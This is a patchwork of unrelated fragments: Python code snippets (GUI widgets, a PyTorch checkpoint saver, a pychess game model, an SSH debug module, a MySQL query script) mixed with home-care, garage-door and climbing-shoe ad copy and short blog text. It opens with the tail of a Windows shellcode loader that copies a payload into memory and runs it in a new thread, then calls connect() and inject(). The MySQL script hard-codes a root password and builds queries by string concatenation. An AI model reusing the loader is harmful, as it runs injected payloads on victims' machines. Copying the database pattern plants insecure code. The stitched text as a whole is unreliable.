ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
# launch in a thread
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# waitfor singleobject
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
html = connect()
inject(html)
|
Grace Givers Home Care LLC was founded in 2017 by Kelli Grace Tipton, who was age 26 at the time. Kelli had been involved in home care for approximately 8 years at the time. She had worked as a caregiver herself, and also had years of experience in supervisory roles in home care and hospice settings. Kelli’s decision to begin Grace-Givers Home Care was reached after she and her family had struggled to find quality, dependable home care service for her grandmother, who was terminally ill.
Grace Givers has quickly become the “go to” source for home care on the Cumberland Plateau, and was recognized as the Crossville-Cumberland County Chamber of Commerce as 2018 Business of the Year with a team of over 50.
In January of 2018 they opened the only State Licensed Adult Day Center in Crossville, at their Peavine Road Location to serve those who would like to receive goal oriented care in a group setting.
which has become our full operational protocol in every aspect of the company.
To be: Genuine, Respectful, Adaptable, Considerate,and Empathetic.
We are not simply a “sitter service”. All of our Grace Givers are thoroughly trained and competent in hands-on care (assistance with bathing, toileting, dressing, etc.) as well as the basic light housekeeping, meal prep, and other household management tasks we offer. Our pre-hire screenings and processing go far beyond the basic state requirements for hiring caregivers, so that you or your loved one will receive the most reliable, trustworthy care possible.
Grace Givers Home Care is a Certified Economically Disadvantaged Woman Owned Small Business. We strive to keep a happy, healthy work environment for all of our team members, with competitive wages. This helps us to recruit, and hold onto the best of the best.
Being born and raised in the Upper Cumberland, I’ve saw things evolve for the better, and I want to do my part to help bring that change to it’s fullest potential. I hope to create careers, and not just “jobs”, along with upholding a trusted, local company that can assist with the upcoming “aging boom” that is beginning to take place. Leaders in our area and state work hard to recruit retirees to our area, and we have to make sure we have the capacity and quality of care to assist those who have decided spend their Golden Years with us, as well as those who have lived and worked here all their lives, and helped to make it what it is today. My hope is to provide easily accessible, affordable, quality, and dependable service for everyone in the community who may need it , whether it be a new mom, or someone with only days to live.
With Grace Giver’s, you can rest assured you or your loved one will receive the best care around!
We are available 24/7 to answer any questions you may have regarding home care for you or your loved one. We don’t believe in answering services here–just highly trained, local experts!
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
from gen.ui_main_view import Ui_MainView
from views.component_view import ComponentView
from views.task_view import TaskView
# from views.component_main_window import ComponentMainWindow
# from views.routine_widget import RoutineWidget
from models import model
class MainView(QtGui.QMainWindow):
def __init__(self, model, comp_ctrl, task_ctrl):
super(MainView, self).__init__(None)
self.model = model
self.comp_ctrl = comp_ctrl
self.task_ctrl = task_ctrl
self.build_ui()
def build_ui(self):
self.ui = Ui_MainView()
self.ui.setupUi(self)
# self.build_subwindows()
# self.ui.action_routine_editor.triggered.connect(self.on_window_routine_editor)
self.build_menu_bar()
self.build_comps_dockwidget()
self.build_tasks_dockwidget()
self.ui.action_open_task.triggered.connect(self.on_open_task)
def build_menu_bar(self):
self.ui.action_about.triggered.connect(self.show_about)
def show_about(self):
QtGui.QMessageBox.information(self, model.APP_NAME, '{} v{}\n\n{}'.format(model.APP_NAME,
model.APP_VERSION,
model.APP_URL))
def on_open_task(self):
print self.model.app.activeWindow()
print self.ui.mdiArea.activeSubWindow()
print self.ui.mdiArea.focusWidget()
print ''
def build_comps_dockwidget(self):
self.ui.treeView_comps_available.setModel(self.model.comps_available_model)
self.ui.treeView_comps_available.setHeaderHidden(True)
self.ui.treeView_comps_available.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
self.ui.treeView_comps_available.expandAll()
self.ui.treeView_comps_available.doubleClicked.connect(self.test2)
def build_tasks_dockwidget(self):
self.ui.treeView_tasks_available.setModel(self.model.tasks_available_model)
self.ui.treeView_tasks_available.setHeaderHidden(True)
self.ui.treeView_tasks_available.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
self.ui.treeView_tasks_available.expandAll()
self.ui.treeView_tasks_available.doubleClicked.connect(self.test)
def test2(self, index):
# make a new task subwindow
comp = self.comp_ctrl.create_comp(index)
if comp is not None:
self.new_comp_subwindow(comp)
def test(self, index):
# make a new task subwindow
task = self.task_ctrl.create_task(index)
if task is not None:
self.new_task_subwindow(task)
def new_comp_subwindow(self, comp, params=None):
self.comp_view = ComponentView(self, comp)
self.ui.mdiArea.addSubWindow(self.comp_view)
self.comp_view.show()
def new_task_subwindow(self, task, params=None):
self.task_view = TaskView(self, task)
self.ui.mdiArea.addSubWindow(self.task_view)
self.task_view.show()
# self.task_widget = TaskWidget(self, task)
#
# # sub_window = QtGui.QMdiSubWindow()
# # sub_window.setWidget(task_widget)
#
# # w = QtGui.QWidget(self)
# #
# # w.add
# #
# # # w.move(300, 300)
# # w.setWindowTitle('Simple')
# # w.show()
#
#
# _ = self.ui.mdiArea.addSubWindow(self.task_widget)
#
# print 'ere'
# FormWidget.show()
# class FormWidget(QtGui.QWidget):
# def __init__(self, parent):
# super(FormWidget, self).__init__(parent)
# self.layout = QtGui.QVBoxLayout(self)
#
# self.button1 = QtGui.QPushButton("Button 1")
# self.layout.addWidget(self.button1)
#
# self.button2 = QtGui.QPushButton("Button 2")
# self.layout.addWidget(self.button2)
#
# self.setLayout(self.layout)
#
#
def build_subwindows(self):
# pass
# samples
# self.ui.mdiArea.closeAllSubWindows()
self.task_widget = TaskWidget(self, None)
_ = self.ui.mdiArea.addSubWindow(self.task_widget)
# self.task_widget.activateWindow()
self.task_widget.show()
#
# self.task_widget2 = TaskWidget(self)
# self.task_widget2.setWindowTitle('hello!')
# _ = self.ui.mdiArea.addSubWindow(self.task_widget2)
#
# # try putting a main window in a sub window
# self.component_main_window = ComponentMainWindow(self)
# _ = self.ui.mdiArea.addSubWindow(self.component_main_window)
# # self.component_main_window.show()
#
# self.routine_widget = RoutineWidget(self)
# _ = self.ui.mdiArea.addSubWindow(self.routine_widget)
# self.routine_editor = RoutineEditor(self)
# flags = self.routine_editor.windowFlags()
# # self.routine_editor.setWindowFlags(flags | QtCore.Qt.WindowStaysOnTopHint)
# # self.routine_editor.setWindowModality(QtCore.Qt)
#
# def on_window_routine_editor(self, checked):
# if checked:
# self.routine_editor.show()
# else:
# self.routine_editor.hide()
|
Mentalization-Based Treatment (MBT) is an evidence-based approach developed by British clinicians Peter Fonagy and Anthony Bateman for individuals struggling with Borderline Personality Disorder. Although MBT grew out of a psychodynamic/psychoanalytic approach, it also integrates aspects of contemporary attachment theory, mindfulness, and cognitive behavioral approaches.
Can I be helped by MBT?
Mentalization Based Treatment was originally designed for individuals experiencing symptoms of Borderline Personality Disorder (BPD). Today, however, MBT has broader application for treating adolescents, families and couples who find being in relationships extremely tumultuous and difficult. MBT focuses on helping individuals develop the capacity to think about and deal with difficult emotions in stressful (interpersonal) situations.
Karen A. McCauley has additional intensive training in Mentalization-Based Treatment. She works with individuals and couples who find that being in relationships can mean intense emotional swings.
|
"""Tools to save/restore model from checkpoints."""
import argparse
import sys
import os
import torch
import re
import json
CHECKPOINT_PATTERN = re.compile('^checkpoint-(\d+)$')
class ArgsDict(dict):
def __init__(self, **kwargs):
super(ArgsDict, self).__init__()
for key, value in kwargs.items():
self[key] = value
self.__dict__ = self
def load_checkpoint(model, optimizer, model_dir, map_to_cpu=False, step=None):
path = os.path.join(model_dir, 'checkpoint')
if step is not None:
path += '-{:08d}'.format(step)
if os.path.exists(path):
print("Loading model from %s" % path)
if map_to_cpu:
checkpoint = torch.load(
path, map_location=lambda storage, location: storage)
else:
checkpoint = torch.load(path)
old_state_dict = model.state_dict()
for key in old_state_dict.keys():
if key not in checkpoint['model']:
checkpoint['model'][key] = old_state_dict[key]
model.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
return checkpoint.get('step', 0)
return 0
def load_and_map_checkpoint(model, model_dir, remap):
path = os.path.join(model_dir, 'checkpoint')
print("Loading parameters %s from %s" % (remap.keys(), model_dir))
checkpoint = torch.load(path)
new_state_dict = model.state_dict()
for name, value in remap.items():
# TODO: smarter mapping.
new_state_dict[name] = checkpoint['model'][value]
model.load_state_dict(new_state_dict)
def save_checkpoint(model, optimizer, step, model_dir, ignore=[],
keep_every_n=10000000):
if not os.path.exists(model_dir):
os.makedirs(model_dir)
path = os.path.join(model_dir, 'checkpoint')
step_padded = format(step, '08d')
state_dict = model.state_dict()
if ignore:
for key in state_dict.keys():
for item in ignore:
if key.startswith(item):
state_dict.pop(key)
torch.save({
'model': state_dict,
'optimizer': optimizer.state_dict(),
'step': step
}, '{}-{}'.format(path, step_padded))
if os.path.exists(path):
os.unlink(path)
source = 'checkpoint-' + step_padded
os.symlink(source, path)
# Cull old checkpoints.
if keep_every_n is not None:
all_checkpoints = []
for name in os.listdir(model_dir):
m = CHECKPOINT_PATTERN.match(name)
if m is None or name == source:
continue
checkpoint_step = int(m.group(1))
all_checkpoints.append((checkpoint_step, name))
all_checkpoints.sort()
last_step = float('-inf')
for checkpoint_step, name in all_checkpoints:
if checkpoint_step - last_step >= keep_every_n:
last_step = checkpoint_step
continue
os.unlink(os.path.join(model_dir, name))
class Saver(object):
"""Class to manage save and restore for the model and optimizer."""
def __init__(self, model, optimizer, keep_every_n=None):
self._model = model
self._optimizer = optimizer
self._keep_every_n = keep_every_n
def restore(self, model_dir, map_to_cpu=False, step=None):
"""Restores model and optimizer from given directory.
Returns:
Last training step for the model restored.
"""
last_step = load_checkpoint(
self._model, self._optimizer, model_dir, map_to_cpu, step)
return last_step
def save(self, model_dir, step):
"""Saves model and optimizer to given directory.
Args:
model_dir: Model directory to save.
step: Current training step.
"""
save_checkpoint(self._model, self._optimizer, step, model_dir,
keep_every_n=self._keep_every_n)
def restore_part(self, other_model_dir, remap):
"""Restores part of the model from other directory.
Useful to initialize part of the model with another pretrained model.
Args:
other_model_dir: Model directory to load from.
remap: dict, remapping current parameters to the other model's.
"""
load_and_map_checkpoint(self._model, other_model_dir, remap)
def save_args(args):
if not os.path.exists(args.model_dir):
os.makedirs(args.model_dir)
with open(os.path.join(args.model_dir, 'args.json'), 'w') as f:
f.write(json.dumps(vars(args)))
def restore_args(args):
if not os.path.exists(args.model_dir):
raise Exception('{} does not exist'.format(args.model_dir))
with open(os.path.join(args.model_dir, 'args.json')) as f:
new_args = json.loads(f.read())
for arg in new_args:
if not hasattr(args, arg):
setattr(args, arg, new_args[arg])
def print_params(dct, indent=0):
for key in dct:
if isinstance(dct[key], dict):
print(" " * indent + str(key))
print_params(dct[key], indent + 2)
elif isinstance(dct[key], torch.Tensor):
print(" " * indent + key + " " + str(dct[key].size()))
else:
print(" " * indent + key + " = " + str(dct[key]))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Checkpoint Viewer')
parser.add_argument('--model_dir', type=str, default='')
args = parser.parse_args()
path = os.path.join(args.model_dir, 'checkpoint')
print("Loading model from %s" % path)
checkpoint = torch.load(path)
print_params(checkpoint)
|
I'm not going to rant about politics this morning because, frankly, it's exhausting. I'm only right now, this morning. An hour from now might be different.
Well, there is this. I just got distracted looking for funny pictures of Steve Bannon and Kelly Anne Conway. There is no shortage (I'd post a few here but don't want to ruin the bread and baby mojo.) but here's a scary idea. Someone started a FB page to promote her run for the presidency in 2020. Lord have mercy.
|
import _mysql
from dealFile import *
#Get of Domains which has more than 2 interfaces have 16-20 examples
db=_mysql.connect(host="localhost",user="root",passwd="zxcv4321",db="DDI")
#db.query("""select COUNT(*) from PPI inner join example on (ID = PPI_ID) where domain1="ACT" and domain2="ACT" and topology_1 = 6 and topology_2 = 6""")
#db.query("""select * from PPI inner join example on (ID = PPI_ID) where domain1="ACT" and domain2="ACT" """)
ddiList=readDDIsFile('listOfDDIsHave2InterfacesOver15.txt')
ddis=[]
#Number of Domains which has 2 interfaces have more than 15 examples
for ddi in ddiList:
[domain1,domain2]=ddi
#print i
print domain1
print domain2
#query='SELECT DISTINCT topology_1,topology_2 from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'"'
#query='SELECT DISTINCT topology_1,topology_2 from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'"'
query='SELECT COUNT(DISTINCT topology_1,topology_2) from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'"'
#print query
#query='select domain1,domain2 from DDI1'
db.query(query)
result=db.store_result()
numTopology=result.fetch_row(0)
#print numTopology[0][0]
if int(numTopology[0][0])>1:
Ctr=False
query='SELECT DISTINCT topology_1,topology_2 from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'"'
db.query(query)
result=db.store_result()
rTopology=result.fetch_row(0)
numOver15=0
for val in rTopology[0:]:
[topology1,topology2]=val
try:
#print topology1+':'+topology2
query='SELECT COUNT(*) from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'" AND topology_1='+topology1+' AND topology_2='+topology2
print query
db.query(query)
result=db.store_result()
numExample=result.fetch_row(0)
print numExample[0][0]
except:
break
if int(numExample[0][0])>15:# if for those interfaces have more than 15 examples if they have less than 21 examples, add it.
if int(numExample[0][0])>20:
Ctr=False
break
else:
Ctr=True
if Ctr==True:
ddis.append(domain1+'_int_'+domain2)
writeListFile('listOfDDIsHaveOver2InterfacesHave15-20Examples.txt',ddis)
#print result.fetch_row()
#print r[0][0] readDDIsFile('listOfDDIsHave2InterfacesOver15.txt')
|
This entry was posted on Saturday, September 15th, 2012 at 5:29 pm and is filed under . You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
|
from __future__ import print_function
import threading
from pychess.compat import StringIO
from pychess.System.Log import log
from pychess.Utils.GameModel import GameModel
from pychess.Utils.Offer import Offer
from pychess.Utils.const import REMOTE, DRAW, WHITE, BLACK, RUNNING, WHITEWON, KILLED, \
TAKEBACK_OFFER, WON_CALLFLAG, WAITING_TO_START, BLACKWON, PAUSE_OFFER, PAUSED, \
RESUME_OFFER, DISCONNECTED, CHAT_ACTION, RESIGNATION, FLAG_CALL, OFFERS, LOCAL, \
ACTION_ERROR_NONE_TO_ACCEPT, UNFINISHED_STATES, ABORT_OFFER
from pychess.Players.Human import Human
from pychess.Savers import fen as fen_loader
from pychess.ic import GAME_TYPES, TYPE_TOURNAMENT_DIRECTOR
class ICGameModel(GameModel):
def __init__(self, connection, ficsgame, timemodel):
assert ficsgame.game_type in GAME_TYPES.values()
GameModel.__init__(self, timemodel, ficsgame.game_type.variant)
self.connection = connection
self.ficsgame = ficsgame
self.ficsplayers = (ficsgame.wplayer, ficsgame.bplayer)
self.gmwidg_ready = threading.Event()
connections = self.connections
connections[connection.bm].append(connection.bm.connect(
"boardUpdate", self.onBoardUpdate))
connections[connection.bm].append(connection.bm.connect(
"timesUpdate", self.onTimesUpdate))
connections[connection.bm].append(connection.bm.connect(
"obsGameEnded", self.onGameEnded))
connections[connection.bm].append(connection.bm.connect(
"curGameEnded", self.onGameEnded))
connections[connection.bm].append(connection.bm.connect(
"gamePaused", self.onGamePaused))
connections[connection.bm].append(connection.bm.connect(
"madeExamined", self.onMadeExamined))
connections[connection.bm].append(connection.bm.connect(
"madeUnExamined", self.onMadeUnExamined))
connections[connection.om].append(connection.om.connect(
"onActionError", self.onActionError))
connections[connection.cm].append(connection.cm.connect(
"kibitzMessage", self.onKibitzMessage))
connections[connection.cm].append(connection.cm.connect(
"whisperMessage", self.onWhisperMessage))
connections[connection.cm].append(connection.cm.connect(
"observers_received", self.onObserversReceived))
connections[connection].append(connection.connect("disconnected",
self.onDisconnected))
rated = "rated" if ficsgame.rated else "unrated"
# This is in the format that ficsgames.org writes these PGN headers
self.tags["Event"] = "FICS %s %s game" % (rated,
ficsgame.game_type.fics_name)
self.tags["Site"] = "freechess.org"
def __repr__(self):
string = GameModel.__repr__(self)
string = string.replace("<GameModel", "<ICGameModel")
fics_game = repr(self.ficsgame)
string = string.replace(", players=", ", ficsgame=%s, players=" % fics_game)
return string
@property
def display_text(self):
text = "[ "
if self.timed:
text += self.timemodel.display_text + " "
text += self.ficsgame.display_rated.lower() + " "
if self.ficsgame.game_type.display_text:
text += self.ficsgame.game_type.display_text + " "
return text + "]"
def __disconnect(self):
if self.connections is None:
return
for obj in self.connections:
# Humans need to stay connected post-game so that "GUI > Actions" works
if isinstance(obj, Human):
continue
for handler_id in self.connections[obj]:
if obj.handler_is_connected(handler_id):
log.debug("ICGameModel.__disconnect: object=%s handler_id=%s" %
(repr(obj), repr(handler_id)))
obj.disconnect(handler_id)
def ficsplayer(self, player):
if player.ichandle == self.ficsplayers[0].name:
return self.ficsplayers[0]
else:
return self.ficsplayers[1]
@property
def remote_player(self):
if self.players[0].__type__ == REMOTE:
return self.players[0]
else:
return self.players[1]
@property
def remote_ficsplayer(self):
return self.ficsplayer(self.remote_player)
def hasGuestPlayers(self):
for player in self.ficsplayers:
if player.isGuest():
return True
return False
@property
def noTD(self):
for player in self.ficsplayers:
if TYPE_TOURNAMENT_DIRECTOR in player.titles:
return False
return True
def onBoardUpdate(self, bm, gameno, ply, curcol, lastmove, fen, wname,
bname, wms, bms):
log.debug(("ICGameModel.onBoardUpdate: id=%s self.ply=%s self.players=%s gameno=%s " +
"wname=%s bname=%s ply=%s curcol=%s lastmove=%s fen=%s wms=%s bms=%s") %
(str(id(self)), str(self.ply), repr(self.players), str(gameno), str(wname), str(bname),
str(ply), str(curcol), str(lastmove), str(fen), str(wms), str(bms)))
if gameno != self.ficsgame.gameno or len(self.players) < 2:
# LectureBot allways uses gameno 1 for many games in one lecture
# or wname != self.players[0].ichandle or bname != self.players[1].ichandle:
return
log.debug("ICGameModel.onBoardUpdate: id=%d, self.players=%s: updating time and/or ply" %
(id(self), str(self.players)))
if self.timed:
log.debug("ICGameModel.onBoardUpdate: id=%d self.players=%s: updating timemodel" %
(id(self), str(self.players)))
# If game end coming from helper connection before last move made
# we have to tap() ourselves
if self.status in (DRAW, WHITEWON, BLACKWON):
if self.timemodel.ply < ply:
self.timemodel.paused = False
self.timemodel.tap()
self.timemodel.paused = True
self.timemodel.updatePlayer(WHITE, wms / 1000.)
self.timemodel.updatePlayer(BLACK, bms / 1000.)
if lastmove is None:
if bname != self.tags["Black"]:
self.tags["Black"] = self.players[
BLACK].name = self.ficsplayers[BLACK].name = bname
self.emit("players_changed")
if wname != self.tags["White"]:
self.tags["White"] = self.players[
WHITE].name = self.ficsplayers[WHITE].name = wname
self.emit("players_changed")
if self.boards[-1].asFen() != fen:
self.status = RUNNING
self.loadAndStart(
StringIO(fen),
fen_loader,
0,
-1,
first_time=False)
self.emit("game_started")
curPlayer = self.players[self.curColor]
curPlayer.resetPosition()
elif ply < self.ply:
log.debug("ICGameModel.onBoardUpdate: id=%d self.players=%s \
self.ply=%d ply=%d: TAKEBACK" %
(id(self), str(self.players), self.ply, ply))
for offer in list(self.offers.keys()):
if offer.type == TAKEBACK_OFFER:
# There can only be 1 outstanding takeback offer for both players on FICS,
# (a counter-offer by the offeree for a takeback for a different number of
# moves replaces the initial offer) so we can safely remove all of them
del self.offers[offer]
# In some cases (like lost on time) the last move is resent
# or we just observing an examined game
if self.reason != WON_CALLFLAG:
if len(self.moves) >= self.ply - ply:
self.undoMoves(self.ply - ply)
else:
self.status = RUNNING
self.loadAndStart(
StringIO(fen),
fen_loader,
0,
-1,
first_time=False)
self.emit("game_started")
curPlayer = self.players[self.curColor]
curPlayer.resetPosition()
elif ply > self.ply + 1:
self.status = RUNNING
self.loadAndStart(
StringIO(fen),
fen_loader,
0,
-1,
first_time=False)
self.emit("game_started")
curPlayer = self.players[self.curColor]
curPlayer.resetPosition()
def onTimesUpdate(self, bm, gameno, wms, bms):
if gameno != self.ficsgame.gameno:
return
if self.timed:
self.timemodel.updatePlayer(WHITE, wms / 1000.)
self.timemodel.updatePlayer(BLACK, bms / 1000.)
def onMadeExamined(self, bm, gameno):
self.examined = True
def onMadeUnExamined(self, bm, gameno):
self.examined = False
def onGameEnded(self, bm, ficsgame):
if ficsgame == self.ficsgame and len(self.players) >= 2:
log.debug(
"ICGameModel.onGameEnded: self.players=%s ficsgame=%s" %
(repr(self.players), repr(ficsgame)))
self.end(ficsgame.result, ficsgame.reason)
def setPlayers(self, players):
GameModel.setPlayers(self, players)
if self.players[WHITE].icrating:
self.tags["WhiteElo"] = self.players[WHITE].icrating
if self.players[BLACK].icrating:
self.tags["BlackElo"] = self.players[BLACK].icrating
def onGamePaused(self, bm, gameno, paused):
if paused:
self.pause()
else:
self.resume()
# we have to do this here rather than in acceptReceived(), because
# sometimes FICS pauses/unpauses a game clock without telling us that the
# original offer was "accepted"/"received", such as when one player offers
# "pause" and the other player responds not with "accept" but "pause"
for offer in list(self.offers.keys()):
if offer.type in (PAUSE_OFFER, RESUME_OFFER):
del self.offers[offer]
def onDisconnected(self, connection):
if self.status in (WAITING_TO_START, PAUSED, RUNNING):
self.end(KILLED, DISCONNECTED)
############################################################################
# Chat management #
############################################################################
def onKibitzMessage(self, cm, name, gameno, text):
if not self.gmwidg_ready.is_set():
self.gmwidg_ready.wait()
if gameno != self.ficsgame.gameno:
return
self.emit("message_received", name, text)
def onWhisperMessage(self, cm, name, gameno, text):
if gameno != self.ficsgame.gameno:
return
self.emit("message_received", name, text)
def onObserversReceived(self, other, gameno, observers):
if int(gameno) != self.ficsgame.gameno:
return
self.emit("observers_received", observers)
############################################################################
# Offer management #
############################################################################
def offerReceived(self, player, offer):
log.debug("ICGameModel.offerReceived: offerer=%s %s" %
(repr(player), offer))
if player == self.players[WHITE]:
opPlayer = self.players[BLACK]
else:
opPlayer = self.players[WHITE]
if offer.type == CHAT_ACTION:
opPlayer.putMessage(offer.param)
elif offer.type in (RESIGNATION, FLAG_CALL):
self.connection.om.offer(offer, self.ply)
elif offer.type in OFFERS:
if offer not in self.offers:
log.debug("ICGameModel.offerReceived: %s.offer(%s)" %
(repr(opPlayer), offer))
self.offers[offer] = player
opPlayer.offer(offer)
# If the offer was an update to an old one, like a new takebackvalue
# we want to remove the old one from self.offers
for offer_ in list(self.offers.keys()):
if offer.type == offer_.type and offer != offer_:
del self.offers[offer_]
def acceptReceived(self, player, offer):
log.debug("ICGameModel.acceptReceived: accepter=%s %s" %
(repr(player), offer))
if player.__type__ == LOCAL:
if offer not in self.offers or self.offers[offer] == player:
player.offerError(offer, ACTION_ERROR_NONE_TO_ACCEPT)
else:
log.debug(
"ICGameModel.acceptReceived: connection.om.accept(%s)" %
offer)
self.connection.om.accept(offer)
del self.offers[offer]
# We don't handle any ServerPlayer calls here, as the fics server will
# know automatically if he/she accepts an offer, and will simply send
# us the result.
def checkStatus(self):
pass
def onActionError(self, om, offer, error):
self.emit("action_error", offer, error)
#
# End
#
def end(self, status, reason):
if self.examined:
self.connection.bm.unexamine()
if self.status in UNFINISHED_STATES:
self.__disconnect()
if self.isObservationGame():
self.connection.bm.unobserve(self.ficsgame)
else:
self.connection.om.offer(Offer(ABORT_OFFER), -1)
self.connection.om.offer(Offer(RESIGNATION), -1)
if status == KILLED:
GameModel.kill(self, reason)
else:
GameModel.end(self, status, reason)
def terminate(self):
for obj in self.connections:
for handler_id in self.connections[obj]:
if obj.handler_is_connected(handler_id):
obj.disconnect(handler_id)
self.connections = None
GameModel.terminate(self)
def goFirst(self):
self.connection.client.run_command("backward 999")
def goPrev(self, step=1):
self.connection.client.run_command("backward %s" % step)
def goNext(self, step=1):
self.connection.client.run_command("forward %s" % step)
def goLast(self):
self.connection.client.run_command("forward 999")
def backToMainLine(self):
self.connection.client.run_command("revert")
|
Technical climbing shoe with innovative closure, consisting of two Velcro straps with differentiated and opposite pull direction. Ideal for multi-purpose use in the mountains, crags and bouldering. The successful combination of synthetic and natural materials provides the best compromise between comfort, technical performance and inalterability in the long run. A special midsole with prehensile area under the toe provides for optimal edging support, increasing sensitivity. A Vibram sole with Xs Grip2 for maximum grip. These features make the Katana Woman shoe ideal for climbers who love climbing in all its forms, from bouldering to the crag and classical climbing routes on the wall.
Suede leather combined with microfiber, slip lasted.
Dentex in the back, Pacific in the front.
+ Multifunctional shape and fit; perfect for all types of climbing.
+ Upper in microfiber in the front to maintain its characteristicsm over time.
+ The anterior part of the sole has no lining to allow for enhanced sensitivity and grip.
|
from PySide2.QtWidgets import QListWidget
from PySide2.QtCore import Signal, Slot, Qt
from PySide2 import QtCore
class CustomListWidget(QListWidget):
customItemSelection = Signal()
def __init__(self, parent=None):
super(CustomListWidget, self).__init__(parent)
self.itemList = []
self.setMinimumSize(QtCore.QSize(160, 0))
self.setMaximumSize(QtCore.QSize(245, 16777215))
def mousePressEvent(self, event):
super(CustomListWidget, self).mousePressEvent(event)
item = self.itemAt(event.pos())
if item:
text = item.text().split(":")[0]
# check button clicked
if event.button() == Qt.LeftButton:
if (event.modifiers() == Qt.ShiftModifier) or (event.modifiers() == Qt.ControlModifier):
self.itemList.append(text)
else:
count = self.itemList.count(text)
self.clearItems()
for c in range(count + 1):
self.itemList.append(text)
elif event.button() == Qt.RightButton:
if text in self.itemList:
self.itemList.remove(text)
# update list text
count = self.itemList.count(text)
self.itemAt(event.pos()).setSelected(count)
if count:
self.itemAt(event.pos()).setText(text + ":" + str(count))
else:
# self.itemAt(event.pos()).setPlainText(text)
self.itemAt(event.pos()).setText(text)
self.customItemSelection.emit()
else:
self.clearItems()
def clearItems(self):
self.itemList = []
for pos in range(self.count()):
self.item(pos).setText(self.item(pos).text().split(":")[0])
# return our custom selected item list
def customItemList(self):
return self.itemList
|
Here at Garage Door Installation Pro, we are here to satisfy your standards when it comes to Garage Door Installation in Fairmont, OK. Our crew of highly skilled experts can provide the expertise that you need with the most sophisticated technologies in the industry. We will apply high standard supplies and cash conserving practices to ensure that you will get the best solutions for the best price. Contact us today by dialing 844-244-6199 to get going.
Here at Garage Door Installation Pro, we understand that you need to keep in budget and lower your expenses wherever it is possible to. Still, saving money should not indicate that you give up superior quality on Garage Door Installation in Fairmont, OK. We provide the best quality while still helping you save money. Our intention is to make sure that you acquire the best quality materials and a end result which endures throughout the years. As an example, we are thorough to avoid pricey errors, work efficiently to save hours, and make sure that you get the most effective bargains on supplies and labor. Call up Garage Door Installation Pro when you need the best services at the lowest price. Call 844-244-6199 to talk with our customer service agents, today.
You will need to be informed concerning Garage Door Installation in Fairmont, OK. You shouldn't enter into it without knowing it properly, and you need to understand what to anticipate. We will take the unexpected surprises from the equation by providing precise and thorough information. Start by dialing 844-244-6199 to go over your venture. We're going to talk about your concerns whenever you call and help you get arranged with a meeting. Our crew can arrive at the appointed time with the appropriate resources, and can work together with you all through the undertaking.
There are a lot of good reasons to pick Garage Door Installation Pro for Garage Door Installation in Fairmont, OK. We are the best option whenever you need the best cash saving options, the highest quality products, and the highest rank of customer service. We fully understand your expectations and intentions, and we're available to assist you with our expertise. Whenever you need Garage Door Installation in Fairmont, choose Garage Door Installation Pro by dialing 844-244-6199, and we are going to be more than pleased to help.
|
''' This module will enable/disable debug for ST Voice switches and
Voice switches, Phones and any generic machine using MS Windows.
_________________________________________________________________________________
|-- startdebug(self,device="switch",argv)
| argv options: sip,trunk,ssua,sb,ext
| device:"switch", "phone" ;
| key:cert key to be used
|
|-- savedebug(self)
|-- cleardebug(self)
class--debug(cls)--|
|-- setdebugenv(self,device="switch)
| "switch" option will enable following:
| - cli
| - trace_redirect 0
| - trace_redirect 1
| "Phone" option will enable following
| - TBA
|-- startTshark(self)
|-- stopTshark(self)
|-- uploadTshark(self,destination)
"will be uploaded to temp directory of script"
_____________________________________________________________________________________
++Changelist++
Version 1.0: Intial Program created
_________________________________________________________________________________
TODO
- Add all functions()
Questions & Feedback: Please contact etoolsclub.com
_________________________________________________________________________________
'''
import etools
import re
import string
import paramiko
import traceback
import sys
import os
from time import sleep
from etools import SSH
from utilities import Directory
login = paramiko.SSHClient()
class SendCommand(SSH):
def startDebug(self):
try:
ssh=self.login.invoke_shell()
ssh.send('cli \n')
sleep(3)
ssh.send('trace_redirect 0 \n')
sleep(3)
ssh.send('trace_redirect 1 \n')
sleep(3)
ssh.send('dbg "on sip" \n')
except Exception:
traceback.print_exc()
def stopDebug():
try:
ssh=self.login.invoke_shell()
ssh.send('dbg "clear" \n')
output= ssh.recv(65535)
path=Directory.create()
with open(r'temp\binarydata.log','wb') as f:
f.write(output)
f.close()
ssh.disconnect()
print ("Closing the SSH Session")
except Exception:
traceback.print_exc()
def sendTone(self ,tonetype):
try:
pass
except Exception:
traceback.print_exc()
def resetTone(self):
try:
pass
except Exception:
traceback.print_exc()
def startCapture(self,filters):
'''use Tshark utility'''
try:
pass
except Exception:
traceback.print_exc()
def stopCapture(self,filters):
try:
pass
except Exception:
traceback.print_exc()
def getCallID(self,samplefile):
samplefile="c:\\Python3\\sample.log"
startstring = "INVITE sip:"
endstring = "Content-Length:"
string = "CallID:"
try:
with open(samplefile , "rb") as infile:
for result in re.findall(b"INVITE sip:(.*?)Content-Length:", infile.read(), re.S): #This will find INVITE transaction
callid = re.findall(b"Call-ID:(.*?)\n", result, re.DOTALL) #This will find CallID within that INVITE Transaction
for i in callid: #Need to iterate list as findall creates a list.
print (i.decode("utf-8")) #This will convert Binary string to regular string
infile.close()
with open('Callid.log', 'wb') as f:
f.write(result)
f.close()
except Exception:
traceback.print_exc()
if __name__ == "__main__":
b = SendCommand()
b.connect()
b.startDebug()
b.stopDebug
|
CWS-boco moves people and people move us. The 3,800 men and women currently working with and for us bring their diverse experience, cultural backgrounds and individual perspectives with them every day in their daily work. We perceive this diversity as a great opportunity for our company. In order to be successful, it is essential not just to accept cultural differences, but rather to appreciate them, see them as an enrichment and promote them.
|
import pymc
def pymc_linear_fit_withoutliers(data1, data2, data1err=None, data2err=None,
